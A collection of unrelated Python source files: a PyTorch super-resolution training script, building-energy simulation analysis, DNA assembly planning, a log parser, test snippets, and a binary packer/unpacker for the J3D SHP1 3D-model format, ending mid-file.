torch.cuda.manual_seed(opt['hardware']['seed']) device = torch.device("cuda" if cuda else "cpu") now = datetime.now() label = f"{opt['model']}-C{opt['channel']}-R{opt[opt['model']]['n_resblocks']}F{opt[opt['model']]['n_feats']}" tb_dir = f"{opt['log_dir']}/{now.strftime('%m%d-%H%M-')}{label}/" print('===> Loading dataset') train_set = SISRDataset(data_dir=opt['data_dir'], augment=opt['augment'], patch_size=opt['patch_size'], v_freq=opt['vFreq'], preload=opt['preload'], norm=False) data_loader = DataLoader(dataset=train_set, num_workers=opt['hardware']['threads'], batch_size=opt['batch_size'], shuffle=True) eval_set = SISRDataset(data_dir=opt['eval_dir'], augment=opt['augment'], patch_size=0, v_freq=5) eval_loader = DataLoader(dataset=eval_set, num_workers=opt['hardware']['threads'], shuffle=True) print('===> Building model') if opt['model'] == 'WDSR': if opt['channel'] == 3: model = MODEL(cuda, n_res=opt['WDSR']['n_resblocks'], n_feats=opt['WDSR']['n_feats'], res_scale=opt['WDSR']['res_scale'], n_colors=3, block_feats=opt['WDSR']['block_feats'], mean=opt['mean']).to(device) else: model = MODEL(cuda, n_res=opt['WDSR']['n_resblocks'], n_feats=opt['WDSR']['n_feats'], res_scale=opt['WDSR']['res_scale'], n_colors=1, mean=[opt['mean'][opt['channel']]]).to(device) elif opt['model'] == 'RRDB': model = RRDBNet(3, 3, opt['RRDB']['n_feats'], opt['RRDB']['n_resblocks']).to(device) else: model = None criterion = nn.L1Loss().to(device) optimizer = optim.Adam(model.parameters(), lr=opt['lr']) # optimizer = Nadam(model.parameters(), lr=0.00001) # optimizer = optim.SGD(model.parameters(), lr=opt['lr'], momentum=0.9, weight_decay=1e-4, nesterov=True) re_avgpool = torch.nn.AvgPool2d((2, 2), stride=(2, 2)) if opt['pre_trained'] and os.path.exists(opt['pre_train_path']): model.load_state_dict(torch.load(opt['pre_train_path'], map_location=lambda storage, loc: storage)) # with open(f"{opt['save_dir']}/optim.pkl", 'rb') as f: # optimizer = pickle.load(f) print('Pre-trained SR model is loaded.') def get_ch(img: torch.Tensor, channel: int): if channel == 0: # Y通道 return img.index_select(1, torch.LongTensor([channel])).to(device) elif 3 > channel > 0: # U和V return re_avgpool(img.index_select(1, torch.LongTensor([channel]))).to(device) elif channel == 3: # 444 return img.to(device) def out_rgb(img, path): img = img.cpu().squeeze(0).numpy().astype(np.uint8).transpose((1,2,0)) if opt['channel'] < 3: img = img[0] elif opt['rgb'] == False: img = cv.cvtColor(img, cv.COLOR_YUV2RGB) cv.imwrite(path, img) return def train(e): print(f"===> Epoch {e} Begin: LR: {optimizer.param_groups[0]['lr']}") epoch_loss = 0 model.train() for batch_i, batch in enumerate(data_loader): t0 = time.time() lr, gt = get_ch(batch[0], opt['channel']), get_ch(batch[1], opt['channel']) optimizer.zero_grad() loss = criterion(model(lr), gt) epoch_loss += loss.item() loss.backward() optimizer.step() t1 = time.time() # 每10个batch画个点用于loss曲线 if batch_i % 10 == 0: print(f"===> Epoch[{e}]({batch_i}/{len(data_loader)}):", f" Loss: {loss.item():.4f} || Timer: {(t1 - t0):.4f} sec.") niter = (epoch * len(data_loader) + batch_i) * opt['batch_size'] with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w: w.add_scalar('Train/Loss', loss.item(), niter) avg_loss = epoch_loss / len(data_loader) with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w: w.add_scalar('Train/lr', optimizer.param_groups[0]['lr'], e) w.add_scalar('Train/epoch_Loss', avg_loss, e) print(f"===> Epoch {e} Complete: Avg. Loss: {avg_loss:.4f}") return def eval_func(e, only=False): epoch_loss = 0 avg_psnr = 0 if opt['pre_trained'] and only: model.load_state_dict(torch.load(opt['pre_train_path'])) model.eval() for batch_i, batch in enumerate(eval_loader): t0 = time.time() lr, gt = get_ch(batch[0], opt['channel']).to(device), get_ch(batch[1], opt['channel']).to(device) with torch.no_grad(): sr = model(lr) _psnr = psnr_tensor(sr, gt) loss = criterion(sr, gt) t1 = time.time() epoch_loss += loss.item() avg_psnr += _psnr if batch_i % 20 == 0: out_rgb(lr, f"/data/evi/{opt['channel']}_{e}_{batch_i}_lr.png") out_rgb(sr, f"/data/evi/{opt['channel']}_{e}_{batch_i}_sr.png") out_rgb(gt, f"/data/evi/{opt['channel']}_{e}_{batch_i}_gt.png") print(f"===> eval({batch_i}/{len(eval_loader)}): PSNR: {_psnr:.4f}", f" Loss: {loss.item():.4f} || Timer: {(t1 - t0):.4f} sec.") avg_psnr /= len(eval_loader) avg_loss = epoch_loss / len(eval_loader) print(f"===> eval Complete: Avg PSNR: {avg_psnr}, Avg. Loss: {avg_loss:.4f}") with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w: w.add_scalar('eval/PSNR', avg_psnr, epoch) w.add_scalar('eval/LOSS', avg_loss, epoch) return avg_psnr def psnr_tensor(img1: torch.Tensor, img2: torch.Tensor): # img1 and img2 have range [0, 255] diff = img1 - img2 mse = torch.mean(diff * diff).item() if mse == 0: return float('inf') return 10 * math.log10(65025.0 / mse) def checkpoint(comment=""): global opt save_path = f"{opt['save_dir']}/{opt['scale']}x_{comment}_{epoch}.pth" torch.save(model.state_dict(), save_path) with open(args.yaml_path, 'r') as f: opt = yaml.load(f) opt['pre_train_path'] = save_path opt['pre_trained'] = True opt['startEpoch'] = epoch + 1 # with open(f"{opt['save_dir']}/optim.pkl", 'wb') as f: # pickle.dump(optimizer, f) with open(args.yaml_path, 'w') as f: f.write(yaml.dump(opt)) print(f"Checkpoint saved to {save_path}") doEval = opt['only_eval'] if doEval: eval_func(-1, opt['only_eval']) else: for epoch in range(opt['startEpoch'], opt['nEpochs'] + 1): train(epoch) if (epoch + 1) % opt['snapshots'] == 0: checkpoint(label) eval_func(epoch) if (epoch + 1) in opt['lr_step']: for param_group in optimizer.param_groups: param_group['lr'] /= 10.0 # 脚本退出后存储配置 with open(args.yaml_path, 'w') as yf: yf.write(yaml.dump(opt)) os.system("bash /root/shutdown.sh") """ 需要调节的: - n_resblocks = 16 - n_feats = 64 - 三个通道均值 mean 从数据中来 - lr 的更新 - batch size - patch size - v freq 每个视频每epoch抽帧次数 """
498269
class GuetError(Exception): pass class InvalidInitialsError(GuetError): pass class UnexpectedError(GuetError): pass
498300
from anyapi import AnyAPI from anyapi.utils import retry from requests.exceptions import MissingSchema import pytest def test_retry(): """Test retry utility""" # I know that I should test retry and retry_until separately # But I couldn't find any idea to test retry_until separately try: invalid_api = AnyAPI("invalidurl", scoped_calls=[retry(2)]) invalid_api.GET() except MissingSchema: assert True else: assert False
498317
import re import os import pandas as pd import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm #color map import getpass import seaborn as sns from scipy.stats import spearmanr, pearsonr, sem import itertools import matplotlib.ticker as ticker # import statsmodels.api as sm def main(): BuildingList = ['05_MaletPlaceEngineering', '01_CentralHouse', '02_BuroHappold_17', '03_BuroHappold_71'] # Location of DATA BuildingHardDisk = ['05_MaletPlaceEngineering_Project', '01_CentralHouse_Project', '02_BuroHappold_17','03_BuroHappold_71'] DataFilePaths = ['MPEB', 'CentralHouse', '17', '71'] # Location of STM data and file naming BuildingLabels = ['MPEB', 'CH', 'Office 17', 'Office 71'] BuildingAbbreviations = ['MPEB', 'CH', '17', '71', 'Nothing'] InputVariables = ['inputs_MaletPlace_FINAL.csv', 'inputs_CentralHouse_222_29_11_15_02_2870.csv', 'Inputs.csv', 'inputs_BH71_27_09_13_46.csv'] FloorAreas = [9579, 5876, 1924, 1691] NO_ITERATIONS = [3000, 2870, 100, 100] building_num = 1 # 0 = MPEB, 1 = CH, 2 = 17, 3 = 71 time_step = 'year' # month or year building_abr = BuildingAbbreviations[building_num] datafile = DataFilePaths[building_num] building_label = BuildingLabels[building_num] floor_area = FloorAreas[building_num] building_harddisk = BuildingHardDisk[building_num] NO_ITERATIONS = NO_ITERATIONS[building_num] inputs = InputVariables[building_num] parallel_runs_harddisk = start_path + 'OneDrive - BuroHappold\EngD_hardrive backup/UCL_DemandLogic/' + building_harddisk + '/ParallelSimulation/Eplusmtr/' DataPath_model_real = start_path + 'OneDrive - BuroHappold\EngD_hardrive backup/UCL_DemandLogic/' + building_harddisk + '/ParallelSimulation/' DataPathImages = start_path + 'OneDrive - BuroHappold/01 - EngD/01 - Thesis/02_Images/' to_hdf = False if to_hdf: runs_outputs = readRuns(parallel_runs_harddisk, time_step=time_step, NO_ITERATIONS=NO_ITERATIONS) print(runs_outputs.head()) runs_outputs.to_hdf(DataPath_model_real + building_abr+ '_' + str(NO_ITERATIONS) +'_RUNS_' + time_step + '.hdf', 'runs', mode='w') runs_outputs = pd.read_hdf(DataPath_model_real + building_abr+ '_' + str(NO_ITERATIONS) +'_RUNS_' + time_step + '.hdf', 'runs') Y_real = runs_outputs.as_matrix() cols_outputs = runs_outputs.columns.tolist() runs_inputs = readInputs(DataPath_model_real, parallel_runs_harddisk, inputs, NO_ITERATIONS) X_real = runs_inputs.as_matrix() cols_inputs = runs_inputs.columns.tolist() # X_real_data = np.vstack((cols_inputs, X_real)) # Y_real_data = np.vstack((cols_outputs, Y_real)) #input_outputs = np.hstack((X_real_data, Y_real_data)) #pd.DataFrame(input_outputs).to_csv(DataPath_model_real + 'input_outputs_' + time_step + '.csv', header=None) df_corr_stnd, df_corr_spearman, df_corr_pearson = calculateCorrelations(DataPath_model_real, X_real, Y_real, cols_outputs, cols_inputs) #heatmapCorrelations(df_corr_pearson, runs_outputs, DataPathImages) #scatterCorrelation(runs_inputs[['WeekdayLandPsched_Offset']], runs_outputs[['Cooling']]/floor_area, input_label='L&P profile offset (per 30Min)', output_label='Cooling $\mathregular{(kWh/m^{2}a)}$', DataPathImages) boxplotPredictions(runs_outputs/floor_area, time_step, DataPathImages) plt.show() def calculateCorrelations(DataPath_model_real, X_real, Y_real, cols_outputs, cols_inputs): cols_outputs.append('Total') Y_real = pd.DataFrame(pd.concat([pd.DataFrame(Y_real), pd.DataFrame(Y_real.sum(axis=1), columns=['Total'])], axis=1)) Y_real = Y_real.as_matrix() print('no. variables', len(cols_inputs)) print('cols_outputs', cols_outputs) label = ['Standardized', 'Spearman', 'Pearson'] for p, q in enumerate(label): df_corr = pd.DataFrame(cols_inputs) df_corr.columns = [q] for j in range(Y_real.shape[1]): coef_list = [] for i in range(X_real.shape[1]): if p == 0: # coef_list.append(sm.OLS(zscore(X_real[:, i]), zscore(Y_real.iloc[:, j])).fit().params[0]) #print('install statsmodels') continue elif p == 1: coef_list.append(spearmanr(X_real[:, i], Y_real[:, j])[0]) elif p == 2: coef_list.append(pearsonr(X_real[:, i], Y_real[:, j])[0]) df_corr[cols_outputs[j]] = pd.Series(coef_list) # append list to df df_corr.set_index(q, inplace=True) if p == 0: df_corr_stnd = df_corr elif p == 1: df_corr_spearman = df_corr elif p == 2: df_corr_pearson = df_corr return df_corr_stnd, df_corr_spearman, df_corr_pearson def scatterCorrelation(df_inputs, df_outputs, input_label, output_label, DataPathImages): df_in = df_inputs.columns.tolist() df_out = df_outputs.columns.tolist() for i, v in enumerate(range(len(df_in))): input = df_inputs[df_in[i]] output = df_outputs[df_out[i]] fig = plt.figure(figsize=(6/ 2.54, 6 / 2.54)) ax = fig.add_subplot(111) reorder = sorted(range(len(input)), key = lambda ii: input[ii]) xd = [input[ii] for ii in reorder] yd = [output[ii] for ii in reorder] par = np.polyfit(xd, yd, 1, full=True) slope=par[0][0] intercept=par[0][1] xl = [min(xd), max(xd)] yl = [slope*xx + intercept for xx in xl] # coefficient of determination, plot text variance = np.var(yd) residuals = np.var([(slope*xx + intercept - yy) for xx,yy in zip(xd,yd)]) Rsqr = np.round(1-residuals/variance, decimals=2) # error bounds yerr = [abs(slope*xx + intercept - yy) for xx,yy in zip(xd,yd)] par = np.polyfit(xd, yerr, 2, full=True) yerrUpper = [(xx*slope+intercept)+(par[0][0]*xx**2 + par[0][1]*xx + par[0][2]) for xx,yy in zip(xd,yd)] yerrLower = [(xx*slope+intercept)-(par[0][0]*xx**2 + par[0][1]*xx + par[0][2]) for xx,yy in zip(xd,yd)] ax.plot(xl, yl, '-', color=colors[1]) ax.plot(xd, yerrLower, '--', color=colors[1]) ax.plot(xd, yerrUpper, '--', color=colors[1]) max_dots = 500 ax.scatter(df_inputs[df_in[i]][:max_dots], df_outputs[df_out[i]][:max_dots], alpha=.8) #ax.plot(x, m*x + b, '-') #ax.set_xlim(0, ), ax.set_xlabel(input_label) ax.set_ylabel(output_label) ax.set_title('$R^2 = %0.2f$'% Rsqr, fontsize=9) plt.savefig(DataPathImages + '_ScatterSingleVariable.png', dpi=300, bbox_inches='tight') def boxplotPredictions(runs, time_step, DataPathImages): # for multiple runs """ :param runs: Pandas DataFrame of predictions (i.e. combined eplusmtr results) :param time_step: 'month' or 'year' :return: """ if time_step == 'year': no_end_uses = len(runs.columns) fig = plt.figure(figsize=(18 / 2.54, 8 / 2.54)) #width and height ax2 = plt.subplot2grid((1, no_end_uses+1), (0, 0)) ax = plt.subplot2grid((1, no_end_uses+1), (0, 1), colspan=no_end_uses) #plot end-uses boxplots x = np.arange(1, len(runs.columns) + 1) bplot = runs.iloc[:, :].plot.box(ax=ax, widths=.85, showfliers=False, patch_artist=True, return_type='dict') #showmeans=True colors_repeat = list(itertools.chain.from_iterable(itertools.repeat(x, 2) for x in colors)) for y in range(runs.shape[0]): if y < 250: # otherwise it gets too crowded q = np.random.normal(0, 0.06, size=runs.shape[1]) ax.scatter(x+q, runs.iloc[y, :], edgecolors='r', alpha=0.05, zorder=5, facecolors='none',) #plot total boxplot bplot_ax2 = pd.DataFrame(runs.sum(axis=1), columns=['Total']).plot.box(ax=ax2, widths=.85, showfliers=False, patch_artist=True, return_type='dict', ) for y in range(pd.DataFrame(runs.sum(axis=1)).shape[0]): if y < 500: q = np.random.normal(0, 0.06) ax2.scatter(1+q, pd.DataFrame(runs.sum(axis=1)).iloc[y, :], edgecolors='r', alpha=0.1, zorder=5, facecolors='none', ) bplots = [bplot, bplot_ax2] for bplot in bplots: [i.set(color=colors[0], linewidth=1.5) for i in bplot['boxes']] [i.set(facecolor='white') for i in bplot['boxes']] for key in ['whiskers', 'caps', 'medians']: for y, box in enumerate(bplot[key]): #set colour of boxes box.set(color=colors[0], linewidth=1.5) [i.set(color='black') for i in bplot['medians']] fig.subplots_adjust(wspace=1) ax2.set_ylabel('Energy $\mathregular{(kWh/m^{2}a)}$') ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4) ax2.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4) ax.set_axisbelow(True) ax2.set_axisbelow(True) if time_step == 'month': cols = runs.columns.tolist() runs_total = runs.sum(axis=1, level=[1]) # sum the months for each end-use runs_total.columns = pd.MultiIndex.from_product([['Total'], runs_total.columns]) # add new level total and columns runs = pd.concat([ runs, runs_total], axis=1) #add total to multiindex print(runs.head()) end_uses = runs.columns.levels[0].tolist() print(runs[end_uses[0]].columns) month_list = runs[end_uses[0]].columns.tolist() ticklabels=month_list fig, axes = plt.subplots(nrows=len(end_uses), ncols=1, sharey=False, figsize=(18 / 2.54, len(end_uses)*3.5 / 2.54)) end_uses.remove('Total') end_uses.append('Total') #total to end for x, y in enumerate(end_uses): ax = axes[x] props = dict(boxes=colors[0], whiskers=colors[0], medians='black', caps=colors[0]) runs.xs(y, axis=1).plot.box(ax=ax, color=props, patch_artist=True, showfliers=False) # access highlevel multiindex #hide month labels for all but last plot ax.set_ylabel(y) if x != len(end_uses)-1: for index, label in enumerate(ax.get_xaxis().get_ticklabels()): label.set_visible(False) ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4) ax.set_axisbelow(True) axes[0].set_title('Energy $\mathregular{(kWh/m^{2}a)}$', fontsize=9) axes[len(end_uses)-1].xaxis.set_major_formatter(ticker.FixedFormatter(ticklabels)) plt.savefig(DataPathImages + time_step + '_boxplot.png', dpi=300, bbox_inches='tight') def heatmapCorrelations(df, runs, DataPathImages): df_perc_total = [i / runs.mean(axis=0).sum() for i in runs.mean(axis=0)] df_perc_total.append(1) # for the total, which is 100% runs = pd.DataFrame(pd.concat([runs, pd.DataFrame(runs.sum(axis=1), columns=['Total'])], axis=1)) cols_outputs = runs.columns.tolist() df_standard = df.multiply(df_perc_total) df_standard = (df_standard-df_standard.mean().mean()) / (df_standard.max().max() - df_standard.min().min()) df_index = df[abs(df[abs(df) > .25].count(axis=1) > 0.25)] df_index_standard = df_standard[abs(df_standard[abs(df_standard) > .25].count(axis=1) > 0.25)] def f7(seq): seen = set() seen_add = seen.add return [x for x in seq if not (x in seen or seen_add(x))] df_index = f7(df_index.index.tolist()+df_index_standard.index.tolist()) df = df.loc[df_index] df_standard = df_standard.loc[df_index] cols_outputs_add = [v+' ['+str(round(df_perc_total[i]*100,1))+'%]' for i,v in enumerate(cols_outputs)] heatmap = df.as_matrix(columns=cols_outputs) fig, ax = plt.subplots(figsize=(10 / 2.54, 12 / 2.54)) use_sns = True if use_sns is True: ax = sns.heatmap(heatmap, linewidths=.8, annot=True, cmap='RdBu_r', annot_kws={"size": 6}, fmt='.2f', vmin=-1, vmax=1) #cmap=cm.Spectral_r, ax.set_yticklabels(df.index, rotation=0) # set y labels ('variables') from index ax.set_xticklabels(cols_outputs_add, rotation=90) # set y labels ('variables') from index ax.xaxis.tick_top() else: im = ax.matshow(heatmap, cmap='RdBu_r', interpolation='none') cbar = plt.colorbar(im, fraction=0.04555, pad=0.04) cbar.ax.tick_params() ind_x = np.arange(df.shape[1]) ind_y = np.arange(df.shape[0]) ax.set_aspect('equal') ax.set_yticks(ind_y) # set positions for y-labels, .5 to put the labels in the middle ax.set_yticklabels(df.index, rotation = 0) # set y labels ('variables') from index ax.set_yticks(ind_y + .5, minor=True) ax.set_xticklabels('') ax.set_xticks(ind_x) # set positions for y-labels, .5 to put the labels in the middle ax.set_xticklabels(cols_outputs_add, rotation=90) # set y labels ('variables') from index ax.set_xticks(ind_x + .5, minor=True) ax.grid(which='minor', linewidth=1, color='white') ax.grid(False, which='major') ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['bottom'].set_visible(False) ax.spines['left'].set_visible(False) # annotating the data inside the heatmap for y in range(df.shape[0]): for x in range(df.shape[1]): plt.text(x, y, '%.2f' % heatmap[y][x],horizontalalignment='center',verticalalignment='center',fontsize=6) plt.savefig(DataPathImages + '_HeatMapCorrelations.png', dpi=400, bbox_inches='tight') if __name__ == '__main__': def start__main__(): print('start') start__main__() from read_predictions import readRuns, readInputs colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#8c564b', '#d62728', '#9467bd', '#aec7e8', '#ffbb78', '#98df8a', '#c49c94', '#ff9896', '#c5b0d5', '#1f77b4', '#ff7f0e', '#2ca02c', '#8c564b', '#d62728', '#9467bd', '#aec7e8', '#ffbb78', '#98df8a', '#c49c94', '#ff9896', '#c5b0d5'] UserName = getpass.getuser() if UserName == 'cvdronke': start_path = 'C:/Users/' + UserName + '/' else: start_path = 'D:/' main()
498331
def my_dir(obj): return dir(obj) class SingleClassInModule(object): def __init__(self, prop): raise NotImplementedError() def not_implemented(self, param): raise NotImplementedError()
498333
from .grammaregex import match_tree, find_tokens, print_tree, verify_pattern, PatternSyntaxException
498349
import testinfra def test_service_is_running_and_enabled(Service): kibana = Service('kibana') assert kibana.is_running assert kibana.is_enabled
498371
from setuptools import setup, find_packages, Command import os setup( name="pythonparser", version="1.4", author="whitequark", author_email="<EMAIL>", url="https://github.com/m-labs/pythonparser", description="A Python parser intended for use in tooling", long_description=open("README.md").read(), license="MIT", install_requires=["regex"], extras_require={}, dependency_links=[], packages=find_packages(exclude=["tests*"]), namespace_packages=[], test_suite="pythonparser.test", package_data={}, ext_modules=[], entry_points={}, )
498384
import sys from pathlib import Path def set_api(key): token_file = Path(__file__).parent.absolute() / "key" token_file.write_text(key) print("The API-token " + key + " was entered and saved.")
498397
import dnaweaver as dw import time cheap_dna_offer = dw.CommercialDnaOffer( name="CheapDNA.", sequence_constraints=[ dw.NoPatternConstraint(enzyme="BsaI"), dw.SequenceLengthConstraint(max_length=4000), ], pricing=dw.PerBasepairPricing(0.10), ) oligo_dna_offer = dw.CommercialDnaOffer( name="OliGoo", sequence_constraints=[ dw.GcContentConstraint(min_gc=0.3, max_gc=0.7), dw.SequenceLengthConstraint(max_length=100), ], pricing=dw.PerBasepairPricing(0.07), memoize=True, ) oligo_assembly_station = dw.DnaAssemblyStation( name="Oligo Assembly Station", assembly_method=dw.OligoAssemblyMethod( overhang_selector=dw.TmSegmentSelector( min_size=15, max_size=25, min_tm=50, max_tm=70 ), min_segment_length=40, max_segment_length=200, sequence_constraints=[dw.SequenceLengthConstraint(max_length=1500)], duration=8, cost=30, ), supplier=oligo_dna_offer, coarse_grain=20, a_star_factor="auto", memoize=True, ) assembly_station = dw.DnaAssemblyStation( name="Gibson Assembly Station", assembly_method=dw.GibsonAssemblyMethod( overhang_selector=dw.TmSegmentSelector(min_tm=55, max_tm=70), min_segment_length=500, max_segment_length=4000, ), supplier=[cheap_dna_offer, oligo_assembly_station], logger="bar", coarse_grain=100, fine_grain=10, a_star_factor="auto", ) print("Looking for the best assembly plan...") t0 = time.time() sequence = dw.random_dna_sequence(10000, seed=123) quote = assembly_station.get_quote(sequence, with_assembly_plan=True) print(quote.assembly_step_summary()) print("Finished in %.01d seconds" % (time.time() - t0))
498440
import sys import pandas as pd import numpy as np def add_info(df): k = df.columns ks = [len(i) for i in k] ks = max(ks) focus = k[2] focus_value = df[focus] best_focus_value = max(focus_value) best_row = df[df[focus] == best_focus_value] n = len(df[k[0]]) idx = list(range(1,n+1)) + ['*'] + ['best'] +['ave'] + ['std'] best = {i:list(best_row[i])[0] for i in k} ave = {i:np.mean(df[i]) for i in k} std = df.std() std = {i:std[i] for i in k} sep = {i:'-'*(ks-1) for i in k} df = df.append([sep]) df = df.append([best]) df = df.append([ave]) df = df.append([std]) df.index = idx return df print('type focus_0: [val/test/dev/step]') f0 = sys.stdin.readline().strip() print('file dir') file_dir = sys.stdin.readline().strip() file_dir += '/job.log.0' with open(file_dir, 'r') as f: logs = [] for l in f: logs.append(l.strip()) mem = [] if f0 == 'val': f0s = 'dev' else: f0s = f0[:] for l in logs: if l.startswith('batch_size:'): mem.append({'{0}'.format(f0):[], 'test':[]}) elif l.startswith('[{0} evaluation] '.format(f0s)): mem[-1]['{0}'.format(f0)].append(float(l.split('] ')[1].split(', ')[0].split(': ')[1])) elif l.startswith('[test evaluation] '): mem[-1]['test'].append(float(l.split('] ')[1].split(', ')[0].split(': ')[1])) lib = {'loc':[], 'best_test_auc':[], 'best_{0}_auc'.format(f0):[]} for rep in mem: #for rec in range(len(rep['test'])): full_test_times = len(rep['test']) best_loc = np.argmax(rep['{0}'.format(f0)]) best_foucs = rep['{0}'.format(f0)][best_loc] best_test = rep['test'][best_loc] #lib['loc'].append('{0}/{1}'.format(best_loc, len(rep['test']))) lib['loc'].append(best_loc) lib['best_test_auc'].append(best_test) lib['best_{0}_auc'.format(f0)].append(best_foucs) lib = pd.DataFrame(lib) lib = add_info(lib) k = list(lib['loc']) full_rep_times = len(mem) for i in range(len(k)): if i < full_rep_times or i in (full_rep_times+1, full_rep_times+2): k[i] = '{0}/{1}'.format(k[i], full_test_times-1) lib['loc'] = k print(lib)
498462
import numpy from btypes.big_endian import * import gx import logging logger = logging.getLogger(__name__) class Header(Struct): magic = ByteString(4) section_size = uint32 shape_count = uint16 __padding__ = Padding(2) shape_offset = uint32 index_offset = uint32 unknown0_offset = uint32 attribute_descriptor_offset = uint32 matrix_index_offset = uint32 packet_offset = uint32 matrix_selection_offset = uint32 packet_location_offset = uint32 def __init__(self): self.magic = b'SHP1' @classmethod def unpack(cls, stream): header = super().unpack(stream) if header.magic != b'SHP1': raise FormatError(f'invalid magic: {header.magic}') if header.unknown0_offset != 0: logger.warning('unexpected unknown0_offset value: %s', header.unknown0_offset) return header class AttributeDescriptor(Struct): """Arguments to GXSetVtxDesc.""" attribute = EnumConverter(uint32, gx.Attribute) input_type = EnumConverter(uint32, gx.InputType) def __init__(self, attribute, input_type): self.attribute = attribute self.input_type = input_type class AttributeDescriptorList(TerminatedList): element_type = AttributeDescriptor terminator_value = element_type(gx.VA_NULL, gx.NONE) @staticmethod def terminator_predicate(element): return element.attribute == gx.VA_NULL class MatrixSelection(Struct): unknown0 = uint16 # position/normal matrix for texture matrices? noclip.website: use matrix index count = uint16 first = uint32 class PacketLocation(Struct): size = uint32 offset = uint32 class Primitive: def __init__(self, primitive_type, vertices): self.primitive_type = primitive_type self.vertices = vertices class Batch: def __init__(self, primitives, matrix_table, unknown0): self.primitives = primitives self.matrix_table = matrix_table self.unknown0 = unknown0 class Shape(Struct): transformation_type = uint8 __padding__ = Padding(1) batch_count = uint16 attribute_descriptor_offset = uint16 first_matrix_selection = uint16 first_packet = uint16 __padding__ = Padding(2) bounding_radius = float32 min_x = float32 min_y = float32 min_z = float32 max_x = float32 max_y = float32 max_z = float32 def __init__(self): self.transformation_type = 0 @classmethod def pack(cls, stream, shape): shape.batch_count = len(shape.batches) super().pack(stream, shape) def get_attribute_type(attribute_descriptor): if attribute_descriptor.input_type == gx.INDEX8: return numpy.uint8 if attribute_descriptor.input_type == gx.INDEX16: return numpy.uint16 if attribute_descriptor.input_type == gx.DIRECT: if attribute_descriptor.attribute == gx.VA_PTNMTXIDX: return numpy.uint8 if attribute_descriptor.attribute in gx.VA_TEXMTXIDX: return numpy.uint8 raise ValueError(f'invalid direct attribute: {attribute_descriptor.attribute}') raise ValueError(f'invalid input type: {attribute_descriptor.input_type}') def get_vertex_type(attribute_descriptors): return numpy.dtype([ (descriptor.attribute.name, get_attribute_type(descriptor)) for descriptor in attribute_descriptors ]).newbyteorder('>') def pack_packet(stream, primitives): for primitive in primitives: uint8.pack(stream, primitive.primitive_type) uint16.pack(stream, len(primitive.vertices)) primitive.vertices.tofile(stream) align(stream, 0x20, b'\x00') def unpack_packet(stream, vertex_type, size): # The entire packet is read into memory at once to improve performance packet = stream.read(size) primitives = [] i = 0 while i < size: opcode = packet[i] if opcode == 0x00: i += 1 continue primitive_type = gx.PrimitiveType(opcode) vertex_count = uint16.unpack_from(packet, i + 1) vertices = numpy.frombuffer(packet, vertex_type, vertex_count, i + 3) primitives.append(Primitive(primitive_type, vertices)) i += 3 + vertex_count*vertex_type.itemsize return primitives class Haystack: def __init__(self): self.keys = [] self.values = [] def __getitem__(self, key): try: index = self.keys.index(key) except ValueError: raise KeyError(key) return self.values[index] def __setitem__(self, key, value): try: index = self.keys.index(key) except ValueError: self.keys.append(key) self.values.append(value) else: self.values[index] = value def __contains__(self, key): return key in self.keys def pack(stream, shapes): base = stream.tell() header = Header() header.shape_count = len(shapes) stream.write(b'\x00'*Header.sizeof()) header.shape_offset = stream.tell() - base stream.write(b'\x00'*Shape.sizeof()*len(shapes)) header.index_offset = stream.tell() - base for index in range(len(shapes)): uint16.pack(stream, index) align(stream, 4) header.unknown0_offset = 0 align(stream, 0x20) header.attribute_descriptor_offset = stream.tell() - base deduplicate_table = Haystack() for shape in shapes: if shape.attribute_descriptors not in deduplicate_table: offset = stream.tell() - base - header.attribute_descriptor_offset deduplicate_table[shape.attribute_descriptors] = offset AttributeDescriptorList.pack(stream, shape.attribute_descriptors) shape.attribute_descriptor_offset = deduplicate_table[shape.attribute_descriptors] matrix_indices = [] matrix_selections = [] for shape in shapes: shape.first_matrix_selection = len(matrix_selections) for batch in shape.batches: matrix_selection = MatrixSelection() matrix_selection.unknown0 = batch.unknown0 matrix_selection.first = len(matrix_indices) matrix_selection.count = len(batch.matrix_table) matrix_indices.extend(batch.matrix_table) matrix_selections.append(matrix_selection) header.matrix_index_offset = stream.tell() - base for matrix_index in matrix_indices: uint16.pack(stream, matrix_index) align(stream, 0x20) header.packet_offset = stream.tell() - base packet_locations = [] for shape in shapes: shape.first_packet_location = len(packet_locations) for batch in shape.batches: offset = stream.tell() pack_packet(stream, batch.primitives) packet_location = PacketLocation() packet_location.offset = offset - header.packet_offset - base packet_location.size = stream.tell() - offset packet_locations.append(packet_location) header.matrix_selection_offset = stream.tell() - base for matrix_selection in matrix_selections: MatrixSelection.pack(stream, matrix_selection) header.packet_location_offset = stream.tell() - base for packet_location in packet_locations: PacketLocation.pack(stream, packet_location) align(stream, 0x20) header.section_size = stream.tell() - base stream.seek(base) Header.pack(stream, header) stream.seek(base + header.shape_offset) for shape in shapes: Shape.pack(stream, shape) stream.seek(base + header.section_size) def unpack(stream): base = stream.tell() header = Header.unpack(stream) stream.seek(base + header.shape_offset) shapes = [Shape.unpack(stream) for _ in range(header.shape_count)] stream.seek(base + header.index_offset) for index in range(header.shape_count): if index != uint16.unpack(stream): raise FormatError('invalid index') duplicate_table = {} for shape in shapes: offset = base + header.attribute_descriptor_offset + shape.attribute_descriptor_offset if offset not in duplicate_table: stream.seek(offset) attribute_descriptors = AttributeDescriptorList.unpack(stream) duplicate_table[offset] = attribute_descriptors shape.attribute_descriptors = duplicate_table[offset] stream.seek(base + header.matrix_selection_offset) count = max(shape.first_matrix_selection + shape.batch_count for shape in shapes) matrix_selections = [MatrixSelection.unpack(stream) for _ in range(count)] stream.seek(base + header.matrix_index_offset) count = max(selection.first + selection.count for selection in matrix_selections) matrix_indices = [uint16.unpack(stream) for _ in range(count)] stream.seek(base + header.packet_location_offset) count = max(shape.first_packet + shape.batch_count for shape in shapes) packet_locations = [PacketLocation.unpack(stream) for _ in range(count)] for shape in shapes: vertex_type = get_vertex_type(shape.attribute_descriptors) shape.batches = [None]*shape.batch_count for i in range(shape.batch_count): matrix_selection = matrix_selections[shape.first_matrix_selection + i] matrix_table = matrix_indices[matrix_selection.first : matrix_selection.first + matrix_selection.count] packet_location = 